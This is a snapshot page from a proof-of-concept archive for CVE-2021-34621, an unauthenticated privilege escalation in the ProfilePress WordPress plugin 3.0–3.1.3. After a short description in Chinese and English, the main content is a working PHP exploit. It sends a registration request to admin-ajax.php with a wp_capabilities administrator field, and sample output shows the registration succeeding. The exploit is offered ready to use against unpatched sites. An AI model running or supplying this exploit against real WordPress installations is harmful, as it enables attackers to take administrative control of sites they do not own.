Associated Vulnerability
Title:WordPress 访问控制错误漏洞 (CVE-2021-34621)Description:WordPress是WordPress(Wordpress)基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 WordPress 的 ProfilePress 插件3.0.0 - 3.1.3版本存在安全漏洞,该漏洞源于~/src/Classes/RegistrationAuth.php 文件中的用户注册组件。攻击者可以利用该漏洞以管理员身份在站点上注册。
Description
ProfilePress 3.0 - 3.1.3 - Unauthenticated Privilege Escalation
Readme
# CVE-2021-34621
ProfilePress 3.0 - 3.1.3 - Unauthenticated Privilege Escalation
# Description
The user registration functionality of the plugin allowed arbitrary user meta to be supplied, including wp_capabilities, during registration which made it possible for users to register as an administrator.
# POC
```
<?php
// Settings
$wp_url = $argv[1];
// Update Settings
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'reg_username' => 'Hax0r',
'reg_email' => 'Hax0r@Hax0r.com',
'reg_password' => 'password',
'reg_password_present' => 'true',
'reg_first_name' => 'Hax0r',
'reg_last_name' => 'Hax0r',
'wp_capabilities[administrator]' => '1',
'action' => 'pp_ajax_signup',
'melange_id' => ''
]);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
```
Script Usage
---
```
$ python3 CVE-2021-34621.py --url http://wordpress.lan --username test2 --email test2@test.com --password test
{"message":"<div class=\"profilepress-reg-status success\">Registration successful.<\/div>"}
```
File Snapshot
[4.0K] /data/pocs/118792beee4eddaa4bfbb4123aecd9fb20026a9a
├── [2.3K] CVE-2021-34621.py
├── [ 34K] LICENSE
└── [1.2K] README.md
0 directories, 3 files
Remarks
1. It is advised to access via the original source first.
2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.